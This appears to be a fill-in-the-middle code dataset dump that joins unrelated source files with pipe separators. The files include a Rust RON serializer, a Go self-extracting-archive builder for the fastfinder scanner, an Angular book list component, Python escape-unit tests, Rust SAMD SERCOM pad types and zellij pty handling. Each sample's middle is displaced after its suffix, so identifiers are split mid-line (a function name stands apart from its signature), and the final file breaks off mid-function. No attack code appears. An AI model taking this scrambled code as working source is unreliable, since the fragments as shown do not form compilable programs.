self.start_indent()?;
}
if let Some((_, ref mut pretty)) = self.pretty {
pretty.sequence_index.push(0);
}
Ok(Compound {
ser: self,
state: State::First,
newtype_variant: false,
})
}
fn serialize_tuple(self, len: usize) -> Result<Self::SerializeTuple> {
let old_newtype_variant = self.newtype_variant;
self.newtype_variant = false;
if !old_newtype_variant {
self.output.write_all(b"(")?;
}
if self.separate_tuple_members() {
self.is_empty = Some(len == 0);
self.start_indent()?;
}
Ok(Compound {
ser: self,
state: State::First,
newtype_variant: old_newtype_variant,
})
}
fn serialize_tuple_struct(
self,
name: &'static str,
len: usize,
) -> Result<Self::SerializeTupleStruct> {
if self.struct_names() && !self.newtype_variant {
self.write_identifier(name)?;
}
self.serialize_tuple(len)
}
fn serialize_tuple_variant(
self,
_: &'static str,
_: u32,
variant: &'static str,
len: usize,
) -> Result<Self::SerializeTupleVariant> {
self.newtype_variant = false;
self.write_identifier(variant)?;
self.output.write_all(b"(")?;
if self.separate_tuple_members() {
self.is_empty = Some(len == 0);
self.start_indent()?;
}
Ok(Compound {
ser: self,
state: State::First,
newtype_variant: false,
})
}
fn serialize_map(self, len: Option<usize>) -> Result<Self::SerializeMap> {
self.newtype_variant = false;
self.output.write_all(b"{")?;
if let Some(len) = len {
self.is_empty = Some(len == 0);
}
self.start_indent()?;
Ok(Compound {
ser: self,
state: State::First,
newtype_variant: false,
})
}
fn serialize_struct(self, name: &'static str, len: usize) -> Result<Self::SerializeStruct> {
let old_newtype_variant = self.newtype_variant;
self.newtype_variant = false;
if !old_newtype_variant {
if self.struct_names() {
self.write_identifier(name)?;
}
self.output.write_all(b"(")?;
}
self.is_empty = Some(len == 0);
self.start_indent()?;
Ok(Compound {
ser: self,
state: State::First,
newtype_variant: old_newtype_variant,
})
}
fn serialize_struct_variant(
self,
_: &'static str,
_: u32,
variant: &'static str,
len: usize,
) -> Result<Self::SerializeStructVariant> {
self.newtype_variant = false;
self.write_identifier(variant)?;
self.output.write_all(b"(")?;
self.is_empty = Some(len == 0);
self.start_indent()?;
Ok(Compound {
ser: self,
state: State::First,
newtype_variant: false,
})
}
}
enum State {
First,
Rest,
}
#[doc(hidden)]
pub struct Compound<'a, W: io::Write> {
ser: &'a mut Serializer<W>,
state: State,
newtype_variant: bool,
}
impl<'a, W: io::Write> ser::SerializeSeq for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_element<T>(&mut self, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
if let State::First = self.state {
self.state = State::Rest;
} else {
self.ser.output.write_all(b",")?;
if let Some((ref config, ref mut pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit && !config.compact_arrays {
self.ser.output.write_all(config.new_line.as_bytes())?;
} else {
self.ser.output.write_all(config.separator.as_bytes())?;
}
}
}
if !self.ser.compact_arrays() {
self.ser.indent()?;
}
if let Some((ref mut config, ref mut pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit && config.enumerate_arrays {
let index = pretty.sequence_index.last_mut().unwrap();
write!(self.ser.output, "/*[{}]*/ ", index)?;
*index += 1;
}
}
value.serialize(&mut *self.ser)?;
Ok(())
}
fn end(self) -> Result<()> {
if let State::Rest = self.state {
if let Some((ref config, ref mut pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit && !config.compact_arrays {
self.ser.output.write_all(b",")?;
self.ser.output.write_all(config.new_line.as_bytes())?;
}
}
}
if !self.ser.compact_arrays() {
self.ser.end_indent()?;
}
if let Some((_, ref mut pretty)) = self.ser.pretty {
pretty.sequence_index.pop();
}
// seq always disables `self.newtype_variant`
self.ser.output.write_all(b"]")?;
Ok(())
}
}
impl<'a, W: io::Write> ser::SerializeTuple for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_element<T>(&mut self, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
if let State::First = self.state {
self.state = State::Rest;
} else {
self.ser.output.write_all(b",")?;
if let Some((ref config, ref pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit && self.ser.separate_tuple_members() {
self.ser.output.write_all(config.new_line.as_bytes())?;
} else {
self.ser.output.write_all(config.separator.as_bytes())?;
}
}
}
if self.ser.separate_tuple_members() {
self.ser.indent()?;
}
value.serialize(&mut *self.ser)?;
Ok(())
}
fn end(self) -> Result<()> {
if let State::Rest = self.state {
if let Some((ref config, ref pretty)) = self.ser.pretty {
if self.ser.separate_tuple_members() && pretty.indent <= config.depth_limit {
self.ser.output.write_all(b",")?;
self.ser.output.write_all(config.new_line.as_bytes())?;
}
}
}
if self.ser.separate_tuple_members() {
self.ser.end_indent()?;
}
if !self.newtype_variant {
self.ser.output.write_all(b")")?;
}
Ok(())
}
}
// Same thing but for tuple structs.
impl<'a, W: io::Write> ser::SerializeTupleStruct for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_field<T>(&mut self, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
ser::SerializeTuple::serialize_element(self, value)
}
fn end(self) -> Result<()> {
ser::SerializeTuple::end(self)
}
}
impl<'a, W: io::Write> ser::SerializeTupleVariant for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_field<T>(&mut self, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
ser::SerializeTuple::serialize_element(self, value)
}
fn end(self) -> Result<()> {
ser::SerializeTuple::end(self)
}
}
impl<'a, W: io::Write> ser::SerializeMap for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_key<T>(&mut self, key: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
if let State::First = self.state {
self.state = State::Rest;
} else {
self.ser.output.write_all(b",")?;
if let Some((ref config, ref pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit {
self.ser.output.write_all(config.new_line.as_bytes())?;
} else {
self.ser.output.write_all(config.separator.as_bytes())?;
}
}
}
self.ser.indent()?;
key.serialize(&mut *self.ser)
}
fn serialize_value<T>(&mut self, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
self.ser.output.write_all(b":")?;
if let Some((ref config, _)) = self.ser.pretty {
self.ser.output.write_all(config.separator.as_bytes())?;
}
value.serialize(&mut *self.ser)?;
Ok(())
}
fn end(self) -> Result<()> {
if let State::Rest = self.state {
if let Some((ref config, ref pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit {
self.ser.output.write_all(b",")?;
self.ser.output.write_all(config.new_line.as_bytes())?;
}
}
}
self.ser.end_indent()?;
// map always disables `self.newtype_variant`
self.ser.output.write_all(b"}")?;
Ok(())
}
}
impl<'a, W: io::Write> ser::SerializeStruct for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_field<T>(&mut self, key: &'static str, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
if let State::First = self.state {
self.state = State::Rest;
} else {
self.ser.output.write_all(b",")?;
if let Some((ref config, ref pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit {
self.ser.output.write_all(config.new_line.as_bytes())?;
} else {
self.ser.output.write_all(config.separator.as_bytes())?;
}
}
}
self.ser.indent()?;
self.ser.write_identifier(key)?;
self.ser.output.write_all(b":")?;
if let Some((ref config, _)) = self.ser.pretty {
self.ser.output.write_all(config.separator.as_bytes())?;
}
value.serialize(&mut *self.ser)?;
Ok(())
}
fn end(self) -> Result<()> {
if let State::Rest = self.state {
if let Some((ref config, ref pretty)) = self.ser.pretty {
if pretty.indent <= config.depth_limit {
self.ser.output.write_all(b",")?;
self.ser.output.write_all(config.new_line.as_bytes())?;
}
}
}
self.ser.end_indent()?;
if !self.newtype_variant {
self.ser.output.write_all(b")")?;
}
Ok(())
}
}
impl<'a, W: io::Write> ser::SerializeStructVariant for Compound<'a, W> {
type Error = Error;
type Ok = ();
fn serialize_field<T>(&mut self, key: &'static str, value: &T) -> Result<()>
where
T: ?Sized + Serialize,
{
ser::SerializeStruct::serialize_field(self, key, value)
}
fn end(self) -> Result<()> {
ser::SerializeStruct::end(self)
}
}
| {
self.serialize_sint(v)
} |
sfxbuilder.go | package main
import (
"archive/zip"
"bytes"
"fmt"
"io"
"io/ioutil"
"net/http"
"os"
"path/filepath"
"runtime"
"strings"
"gopkg.in/yaml.v3"
)
// BuildSFX creates a self-extracting zip archive and embeds the fastfinder executable / configuration file / yara rules
func | (configuration Configuration, outputSfxExe string, logLevel int, logFileLocation string, noAdvUI bool, hideWindow bool) {
// compress inputDirectory into archive
archive := fastfinderResourcesCompress(configuration, logLevel, logFileLocation, noAdvUI, hideWindow)
file, err := os.Create(outputSfxExe)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
defer file.Close()
// pack sfx binary and customized archive together
file.Write(sfxBinary)
file.Write(archive.Bytes())
}
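// Usage sketch (illustrative; the argument values below are assumptions, not
// taken from the real CLI):
//
//	var cfg Configuration // parsed beforehand from a YAML configuration file
//	BuildSFX(cfg, "fastfinder_sfx.exe", 1, "", false, false)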
// fastfinderResourcesCompress compress every package file into the zip archive
func fastfinderResourcesCompress(configuration Configuration, logLevel int, logFileLocation string, noAdvUI bool, hideWindow bool) bytes.Buffer {
var buffer bytes.Buffer
archive := zip.NewWriter(&buffer)
// embed fastfinder executable
exeName := "fastfinder"
if runtime.GOOS == "windows" {
exeName += ".exe"
}
zipFile, err := archive.Create(exeName)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
fsFile, err := os.ReadFile(os.Args[0])
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
r := bytes.NewReader(fsFile)
_, err = io.Copy(zipFile, r)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
// embed yara rules
configuration.Input.Content.Yara = EnumerateYaraInFolders(configuration.Input.Content.Yara)
for i := 0; i < len(configuration.Input.Content.Yara); i++ {
var fileName string
var fsFile []byte
if IsValidUrl(configuration.Input.Content.Yara[i]) {
response, err := http.Get(configuration.Input.Content.Yara[i])
if err != nil {
LogMessage(LOG_ERROR, "YARA file URL unreachable", configuration.Input.Content.Yara[i], err)
}
fsFile, err = ioutil.ReadAll(response.Body)
if err != nil {
LogMessage(LOG_ERROR, "YARA file URL content unreadable", configuration.Input.Content.Yara[i], err)
}
response.Body.Close()
fileName = filepath.Base(configuration.Input.Content.Yara[i])[:len(filepath.Base(configuration.Input.Content.Yara[i]))-4]
if !strings.HasSuffix(fileName, ".yar") {
fileName += ".yar"
}
} else {
fileName = filepath.Base(configuration.Input.Content.Yara[i])
fsFile, err = os.ReadFile(configuration.Input.Content.Yara[i])
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
}
zipFile, err := archive.Create("fastfinder_resources/" + fileName)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
// cipher rules
if configuration.AdvancedParameters.YaraRC4Key != "" {
fsFile = RC4Cipher(fsFile, configuration.AdvancedParameters.YaraRC4Key)
}
r := bytes.NewReader(fsFile)
_, err = io.Copy(zipFile, r)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
configuration.Input.Content.Yara[i] = "'./fastfinder_resources/" + fileName + "'"
}
// embed configuration file
zipFile, err = archive.Create("fastfinder_resources/configuration.yaml")
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
d, err := yaml.Marshal(&configuration)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
// cipher configuration file
d = RC4Cipher(d, BUILDER_RC4_KEY)
r = bytes.NewReader(d)
_, err = io.Copy(zipFile, r)
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
// sfx exec instructions
var sfxcomment = "the comment below contains sfx script commands\r\n\r\n" +
"Path=" + tempFolder + "\r\n" +
"Setup=" + exeName + " -c " + "fastfinder_resources/configuration.yaml"
// propagate loglevel param
sfxcomment += fmt.Sprintf(" -v %d", logLevel)
	// propagate advanced UI param
if noAdvUI {
sfxcomment += " -u"
}
// output log file
if len(logFileLocation) > 0 {
//sfxcomment += " -o \"" + logFileLocation + "\""
sfxcomment += fmt.Sprintf(" -o %s", logFileLocation)
}
if hideWindow && runtime.GOOS == "windows" {
sfxcomment += " -n"
sfxcomment += "\r\n" +
"Silent=1"
}
	// capture the error from SetComment so the check below is not stale
	err = archive.SetComment(sfxcomment)
	if err != nil {
		return buffer
	}
err = archive.Close()
if err != nil {
LogFatal(fmt.Sprintf("(ERROR) %v", err))
}
return buffer
}
| BuildSFX |
books.ts | import {Component, OnInit} from '@angular/core';
import {Router, ROUTER_DIRECTIVES} from '@angular/router-deprecated';
import {Http, Response} from '@angular/http';
import {Book} from '../../beans/book';
import {BooksService} from '../../services/booksService';
import {UserService} from '../../services/userService';
import {DataContainerService} from '../../services/dataContainerService';
import {KPagination} from '../kpagination/kpagination';
import {FilterFieldPipe} from '../../pipes/filterFieldPipe';
import {UpdateDataPipe} from '../../pipes/updateDataPipe';
import {OrderByPipe} from '../../pipes/orderByPipe';
@Component({
selector: 'books',
templateUrl: 'src/components/books/books.html',
directives: [ROUTER_DIRECTIVES, KPagination],
pipes: [FilterFieldPipe, UpdateDataPipe, OrderByPipe]
})
export class | implements OnInit{
books: Book[]= [];
currentPage: number = 1;
    // pagination filters
bookNameFilter: string = '';
booksPerPageFilter: number = 4;
reverseOrderFilter: boolean = false;
constructor(
private router: Router,
private booksService: BooksService,
public userService: UserService,
public dataContainer: DataContainerService ) {}
ngOnInit(){
this.booksService.getBooks()
.then((books: Book[]) => {
this.books = books;
});
}
switchPage(page:number){
this.currentPage = page;
}
getRatingClass = this.booksService.getRatingClass;
addToBasket= (book: Book) : void => {
this.userService.basket.addProduct(book);
this.router.navigate(['Basket']);
}
}
| Books |
test_esc.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from refinery.units.encoding.esc import esc
from .. import TestUnitBase
class TestEscaping(TestUnitBase):
def test_quoted_string_01(self):
unit = esc(quoted=True)
self.assertEqual(unit.process(RB'"r\x65\x66\x69\x6ee\x72\x79"'), B'refinery')
def test_quoted_string_02(self):
unit = esc(quoted=True, hex=True)
result = unit.reverse(RB'refinery')
self.assertEqual(result, BR'"\x72\x65\x66\x69\x6e\x65\x72\x79"')
def test_quoted_string_03(self):
unit = esc(quoted=True, hex=False)
result = unit.reverse(B'binary\n\a\t.."refinery"!')
self.assertEqual(result, BR'"binary\n\a\t..\"refinery\"!"')
def test_quoted_string_04(self):
unit = esc(quoted=True)
with self.assertRaises(ValueError):
unit(RB'"r\x65\x66\x69\x6ee\x72\x79')
def test_inversion_simple(self):
unit = self.load()
data = self.generate_random_buffer(24)
self.assertEqual(data, unit.process(unit.reverse(data)))
def test_unicode(self):
unit = self.load(unicode=True)
data = u'refinery is all about the パイプライン.'.encode('UTF8')
self.assertEqual(data, unit.process(unit.reverse(data)))
def test_reverse(self):
unit = self.load(reverse=True)
data = B'FOO\tBAR\nBAZ\tBOF.\a\a'
self.assertEqual(BR'FOO\tBAR\nBAZ\tBOF.\a\a', unit(data))
def test_escape_not_greedy(self):
unit = self.load()
data = B'H\\x\\y\\x20\\u\\u0020!'
self.assertEqual(unit(data), B'H\\xy \\u \x00!')
def test_escape_greedy(self):
unit = self.load(greedy=True)
data = B'H\\x\\y\\x20\\u\\u0020!'
self.assertEqual(unit(data), B'Hxy u \x00!')
def test_zalgo_t | zalgo_unicode = U'B̘̥̦̣͇̩̱͎̱͑̿̇̅͂ì̢̬̲̪̯̼̠̉͂̾͋͢͢ṋ̷̡̯̰͖͎̲̋̄͌̒͊̍͑̽͛ą̶̮̗̱̗̥̜̙̞̋̑́̀͐̓͋́̇̆r̶̟͇̬̺̙̝̻̪̥̙̽͊͋̔̍̾̒̄y̗̞̠̬̭̖̼̠̣͐̆͂͗͗̀͞ R̻͍̭͚͍̭̤̜̽̿̄́͡é͕̝͚̻̙̤͌̊̇͆͆̆̊͠f̷̨͓̜̣̜͐͛̿̌̉̋̎͜͜ḯ͚̩͈̮̫́̃͂̀͞ǹ̢̫͔̞̝̝̯̼̊̍͗͗̽̽́̿͜͜ẻ̸͚̮̝͎͖̜̻̙̀̔̆̅̆̔̊͞r̸̢̢̻̣̠̈́̂͛̓͋̍̾̌̕͟y̥̖͖̦̼̱̼̜͍͛́́͊͆̐̍̚͠͞'.encode('UTF8')
zalgo_encoded = B''.join([
BR'B\u0351\u033f\u0307\u0305\u0342\u0318\u0325\u0326\u0323\u0347\u0329\u0331\u034e\u0331',
BR'i\u0300\u0309\u0342\u033e\u034b\u032c\u0362\u0332\u032a\u0322\u032f\u033c\u0320\u0362',
BR'n\u030b\u0304\u034c\u0312\u034a\u030d\u0351\u033d\u035b\u032d\u032f\u0321\u0330\u0356\u034e\u0332\u0337',
BR'a\u030b\u0311\u0341\u0340\u0350\u0343\u034b\u0301\u0307\u0306\u0328\u032e\u0317\u0331\u0317\u0325\u031c\u0319\u031e\u0336',
BR'r\u033d\u034a\u034b\u0314\u030d\u033e\u0312\u0304\u031f\u0347\u032c\u033a\u0319\u031d\u033b\u032a\u0325\u0319\u0336',
BR'y\u0350\u035e\u0306\u0342\u0357\u0357\u0300\u0317\u031e\u0320\u032c\u032d\u0316\u033c\u0320\u0323 ',
BR'R\u0361\u033d\u033f\u0304\u0301\u033b\u034d\u032d\u035a\u034d\u032d\u0324\u031c',
BR'e\u0360\u0301\u034c\u030a\u0307\u0346\u0346\u0306\u030a\u0355\u031d\u035a\u033b\u0319\u0324',
BR'f\u0350\u035b\u033f\u030c\u0309\u030b\u030e\u0328\u0353\u035c\u031c\u035c\u0323\u031c\u0337',
BR'i\u0344\u0341\u0303\u0342\u035e\u0300\u035a\u0329\u0348\u032e\u032b',
BR'n\u0300\u030a\u030d\u0357\u0357\u033d\u033d\u0301\u033f\u032b\u0354\u031e\u035c\u031d\u031d\u035c\u0322\u032f\u033c',
BR'e\u0309\u0300\u0314\u0306\u035e\u0305\u0306\u0314\u030a\u035a\u032e\u031d\u034e\u0356\u031c\u033b\u0319\u0338',
BR'r\u0344\u0302\u0315\u035b\u0343\u034b\u030d\u033e\u030c\u033b\u0322\u0322\u0323\u035f\u0320\u0338',
BR'y\u035b\u0301\u031a\u0301\u034a\u0360\u0346\u0310\u030d\u035e\u0325\u0316\u0356\u0326\u033c\u0331\u033c\u031c\u034d'
])
unit = self.load(unicode=True)
self.assertEqual(zalgo_unicode, unit(zalgo_encoded))
| ext(self):
|
pad.rs | //! Type-level tools to configure SERCOM pads
//!
//! This module helps configure [`Pin`]s as SERCOM pads. It provides type-level
//! tools to convert `Pin`s to the correct [`PinMode`] and to enforce type-level
//! constraints at compile-time.
//!
//! # Overview
//!
//! A SERCOM pad is defined by two types, its corresponding [`Sercom`] instance
//! and its [`PadNum`], from [`Pad0`] to [`Pad3`]. However, a given SERCOM pad
//! can usually be mapped to several possible [`PinId`]s.
//!
//! There are two primary traits defined in this module:
//! - The [`IsPad`] trait is implemented on `Pin` types that are properly
//! configured as SERCOM pads, with `PinMode` [`AlternateC`] or
//! [`AlternateD`]. It acts as both a [type class] for SERCOM pads and as a
//! [type-level function] to recover the corresponding [`Sercom`] and
//! [`PadNum`] types from the `Pin`.
//! - The [`GetPad`] trait maps each [`PinId`] to its corresponding, pad-related
//! types. The [`PadMode`] alias uses `GetPad` to recover the corresponding
//! `PinMode` for a given SERCOM pad, while the [`Pad`] alias recovers the
//! configured [`Pin`] type.
//!
//! [`AlternateC`]: crate::gpio::v2::AlternateC
//! [`AlternateD`]: crate::gpio::v2::AlternateD
//! [type class]: crate::typelevel#type-classes
//! [type-level function]: crate::typelevel#type-level-functions
#![cfg_attr(
feature = "min-samd51g",
doc = "
# IOSET\n
\n
SAMx5x chips do not allow arbitrary combinations of `PinId` for a given
SERCOM. Instead, all `PinId`s must belong to the same IOSET. This module
defines a [type-level enum], [`IoSet`], to enforce this restriction, and the
[`InIoSet`] [type class] is responsible for labeling each `IsPad` type with
its corresponding, valid `IoSet`\\(s).\n
\n
"
)]
use paste::paste;
use seq_macro::seq;
use super::Sercom;
#[cfg(not(feature = "samd11"))]
use crate::gpio::v2::OptionalPinId;
use crate::gpio::v2::{AnyPin, OptionalPin, Pin, PinId, PinMode};
use crate::typelevel::{NoneT, Sealed};
#[cfg(any(feature = "samd11", feature = "samd21"))]
#[path = "pad/impl_pad_thumbv6m.rs"]
mod impl_pad;
#[cfg(feature = "min-samd51g")]
#[path = "pad/impl_pad_thumbv7em.rs"]
mod impl_pad;
//==============================================================================
// PadNum
//==============================================================================
/// Type-level enum representing a SERCOM pad number
///
/// It has variants [`Pad0`], [`Pad1`], [`Pad2`] & [`Pad3`]. See the [type-level
/// enum] documentation for an explanation of the pattern.
///
/// [type-level enum]: crate::typelevel#type-level-enum
pub trait PadNum: Sealed {}
seq!(N in 0..=3 {
paste! {
#[doc = "Type-level variant of [`PadNum`] representing SERCOM pad " N]
///
/// See the [type-level enum] documentation for an explanation of the
/// pattern.
///
/// [type-level enum]: crate::typelevel#type-level-enum
pub enum Pad #N {}
impl Sealed for Pad #N {}
impl PadNum for Pad #N {}
}
});
//==============================================================================
// OptionalPadNum
//==============================================================================
/// Type-level equivalent of `Option<PadNum>`
///
/// See the [`OptionalKind`] documentation for more details on the pattern.
///
/// [`OptionalKind`]: crate::typelevel#optionalkind-trait-pattern
pub trait OptionalPadNum: Sealed {}
impl OptionalPadNum for NoneT {}
impl<N: PadNum> OptionalPadNum for N {}
//==============================================================================
// IsPad
//==============================================================================
/// Type class for [`Pin`]s configured as SERCOM pads
///
/// This trait serves as both a [type class] for `Pin`s configured as SERCOM
/// pads and as a [type-level function] mapping each `Pin` type to its
/// corresponding [`Sercom`] and [`PadNum`].
///
/// [type class]: crate::typelevel#type-classes
/// [type-level function]: crate::typelevel#type-level-functions
pub trait IsPad: AnyPin {
type Sercom: Sercom;
type PadNum: PadNum;
}
//==============================================================================
// OptionalPad
//==============================================================================
/// Type-level equivalent of `Option<Pad>`
///
/// See the [`OptionalKind`] documentation for more details on the pattern.
/// |
impl OptionalPad for NoneT {
type PadNum = NoneT;
}
impl<P: IsPad> OptionalPad for P {
type PadNum = P::PadNum;
}
/// Type-level equivalent of `Some(Pad)`
///
/// See the [`OptionalKind`] documentation for more details on the pattern.
///
/// [`OptionalKind`]: crate::typelevel#optionalkind-trait-pattern
pub trait SomePad: IsPad {}
impl<P: IsPad> SomePad for P {}
//==============================================================================
// GetPad
//==============================================================================
/// Type-level function mapping [`PinId`]s to SERCOM-pad-related types
///
/// For SAMD21 and SAMx5x chips, a [`Sercom`] and a [`PinId`] is enough
/// information to uniquely identify a pad, so this trait returns the
/// corresponding [`PadNum`] and [`PinMode`].
///
/// For SAMD11 chips, on the other hand, some `PinId`s can serve as two
/// different `PadNum`s for the *same* `Sercom`. For these chips, `GetPad`
/// requires a second type parameter to specify the `PadNum` and only returns
/// the `PinMode`.
///
/// See the documentation on [type-level functions] for more details.
///
/// [type-level functions]: crate::typelevel#type-level-functions
#[cfg(feature = "samd11")]
pub trait GetPad<S, N>
where
S: Sercom,
N: PadNum,
Self: PinId,
{
type PinMode: PinMode;
}
/// Type-level function mapping [`PinId`]s to SERCOM-pad-related types
///
/// For SAMD21 and SAMx5x chips, a [`Sercom`] and a [`PinId`] is enough
/// information to uniquely identify a pad, so this trait returns the
/// corresponding [`PadNum`] and [`PinMode`].
///
/// For SAMD11 chips, on the other hand, some `PinId`s can serve as two
/// different `PadNum`s for the *same* `Sercom`. For these chips, `GetPad`
/// requires a second type parameter to specify the `PadNum` and only returns
/// the `PinMode`.
///
/// See the documentation on [type-level functions] for more details.
///
/// [type-level functions]: crate::typelevel#type-level-functions
#[cfg(not(feature = "samd11"))]
pub trait GetPad<S>
where
S: Sercom,
Self: PinId,
{
type PadNum: PadNum;
type PinMode: PinMode;
}
//==============================================================================
// GetPad aliases
//==============================================================================
/// Type alias using [`GetPad`] to recover the [`PinMode`] for a given SERCOM
/// pad
#[cfg(feature = "samd11")]
pub type PadMode<S, N, I> = <I as GetPad<S, N>>::PinMode;
/// Type alias using [`GetPad`] to recover the [`PinMode`] for a given SERCOM
/// pad
#[cfg(not(feature = "samd11"))]
pub type PadMode<S, I> = <I as GetPad<S>>::PinMode;
/// Type alias to recover a [`Pin`] configured as a SERCOM pad in the correct
/// [`PadMode`]
#[cfg(feature = "samd11")]
pub type Pad<S, N, I> = Pin<I, PadMode<S, N, I>>;
/// Type alias to recover a [`Pin`] configured as a SERCOM pad in the correct
/// [`PadMode`]
#[cfg(not(feature = "samd11"))]
pub type Pad<S, I> = Pin<I, PadMode<S, I>>;
//==============================================================================
// GetOptionalPad
//==============================================================================
/// Type-level function mapping [`OptionalPinId`]s to their corresponding
/// [`OptionalPad`]s
///
/// This trait acts as a [type-level function] mapping `OptionalPinId`s to their
/// corresponding `OptionalPad`. In pseudo-Rust, it is the type-level equivalent
/// of starting with `Option<PinId>` and calling `.map(GetPad)` to recover an
/// `Option<Pad>`.
///
/// [type-level function]: crate::typelevel#type-level-functions
#[cfg(not(feature = "samd11"))]
pub trait GetOptionalPad<S: Sercom>: OptionalPinId {
type PadNum: OptionalPadNum;
type Pad: OptionalPad;
}
#[cfg(not(feature = "samd11"))]
impl<S: Sercom> GetOptionalPad<S> for NoneT {
type PadNum = NoneT;
type Pad = NoneT;
}
#[cfg(not(feature = "samd11"))]
impl<S, I> GetOptionalPad<S> for I
where
S: Sercom,
I: PinId + GetPad<S>,
Pad<S, I>: IsPad,
{
type PadNum = I::PadNum;
type Pad = Pad<S, I>;
}
//==============================================================================
// IoSet
//==============================================================================
#[cfg(feature = "min-samd51g")]
mod ioset {
use super::*;
/// Type-level enum representing a SERCOM IOSET
///
/// See the [type-level enum] documentation for more details on the pattern.
///
/// [type-level enum]: crate::typelevel#type-level-enum
pub trait IoSet: Sealed {}
seq!(N in 1..=6 {
paste! {
#[doc = "Type-level variant of [`IoSet`] representing SERCOM IOSET " N]
///
/// See the [type-level enum] documentation for more details on the
/// pattern.
///
/// [type-level enum]: crate::typelevel#type-level-enum
pub enum IoSet #N {}
impl Sealed for IoSet #N {}
impl IoSet for IoSet #N {}
}
});
/// Type-level variant of [`IoSet`] representing an undocumented SERCOM
/// IOSET
///
/// After implementing `IoSet` type checking, it became clear that some
    /// existing boards were using combinations of pins that did not match any
/// IOSET in the datasheet. From that, we infer that there must be at least
/// one undocumented IOSET, and we added this new `IoSet` to account for it.
///
/// As of writing this documentation, only one undocumented IOSET has been
/// discovered: PA16, PA17, PB22 & PB23 configured for `Sercom1`. Both the
/// pygamer & feather_m4 uses this combination.
///
/// See the [type-level enum] documentation for more details on type-level
/// variants.
///
/// [type-level enum]: crate::typelevel#type-level-enum
pub enum UndocIoSet1 {}
impl Sealed for UndocIoSet1 {}
impl IoSet for UndocIoSet1 {}
/// Type class for SERCOM pads in a given [`IoSet`]
///
/// This trait is used to label each [`Pin`] implementing [`IsPad`] with its
/// corresponding [`IoSet`]\(s). Downstream types can use this trait as a
/// [type class] to restrict [`Pin`]s to a given [`IoSet`]. See the [type
/// class] documentation for more details on the pattern.
///
/// [type class]: crate::typelevel#type-classes
pub trait InIoSet<I>
where
Self: IsPad,
I: IoSet,
{
}
}
#[cfg(feature = "min-samd51g")]
pub use ioset::*; | /// [`OptionalKind`]: crate::typelevel#optionalkind-trait-pattern
pub trait OptionalPad: OptionalPin {
type PadNum: OptionalPadNum;
} |
dropbox.rs | use reqwest;
// `?` requires a function that returns `Result`; this sketch assumes the
// blocking reqwest API (pre-0.10), where `reqwest::get` is synchronous.
fn dropbox() -> Result<(), reqwest::Error> {
    let body = reqwest::get("https://www.rust-lang.org")?
        .text()?;
    println!("body = {:?}", body);
    Ok(())
}
fn main() | {
    dropbox().expect("request failed");
} |
|
os_input_output.rs | use std::collections::HashMap;
use crate::panes::PaneId;
use std::env;
use std::os::unix::io::RawFd;
use std::os::unix::process::CommandExt;
use std::path::PathBuf;
use std::process::{Child, Command};
use std::sync::{Arc, Mutex};
use zellij_utils::{async_std, interprocess, libc, nix, signal_hook, zellij_tile};
use async_std::fs::File as AsyncFile;
use async_std::os::unix::io::FromRawFd;
use interprocess::local_socket::LocalSocketStream;
use sysinfo::{ProcessExt, ProcessRefreshKind, System, SystemExt};
use nix::pty::{openpty, OpenptyResult, Winsize};
use nix::sys::signal::{kill, Signal};
use nix::sys::termios;
use nix::unistd;
use signal_hook::consts::*;
use zellij_tile::data::Palette;
use zellij_utils::{
input::command::{RunCommand, TerminalAction},
ipc::{ClientToServerMsg, IpcReceiverWithContext, IpcSenderWithContext, ServerToClientMsg},
shared::default_palette,
};
use async_std::io::ReadExt;
pub use async_trait::async_trait;
pub use nix::unistd::Pid;
use crate::ClientId;
pub(crate) fn set_terminal_size_using_fd(fd: RawFd, columns: u16, rows: u16) {
// TODO: do this with the nix ioctl
use libc::ioctl;
use libc::TIOCSWINSZ;
let winsize = Winsize {
ws_col: columns,
ws_row: rows,
ws_xpixel: 0,
ws_ypixel: 0,
};
// TIOCSWINSZ is a u32, but the second argument to ioctl is u64 on
// some platforms. When checked on Linux, clippy will complain about
// a useless conversion.
#[allow(clippy::useless_conversion)]
unsafe {
ioctl(fd, TIOCSWINSZ.into(), &winsize)
};
}
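// Usage sketch (illustrative): resizing the pty behind `fd` to 80x24 is just
// `set_terminal_size_using_fd(fd, 80, 24)`; the kernel then delivers SIGWINCH
// to the pty's foreground process group.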
/// Handle some signals for the child process. This will loop until the child
/// process exits.
fn handle_command_exit(mut child: Child) {
let mut should_exit = false;
let mut attempts = 3;
let mut signals = signal_hook::iterator::Signals::new(&[SIGINT, SIGTERM]).unwrap();
'handle_exit: loop {
// test whether the child process has exited
match child.try_wait() {
Ok(Some(_status)) => {
// if the child process has exited, break outside of the loop
// and exit this function
// TODO: handle errors?
break 'handle_exit;
}
Ok(None) => {
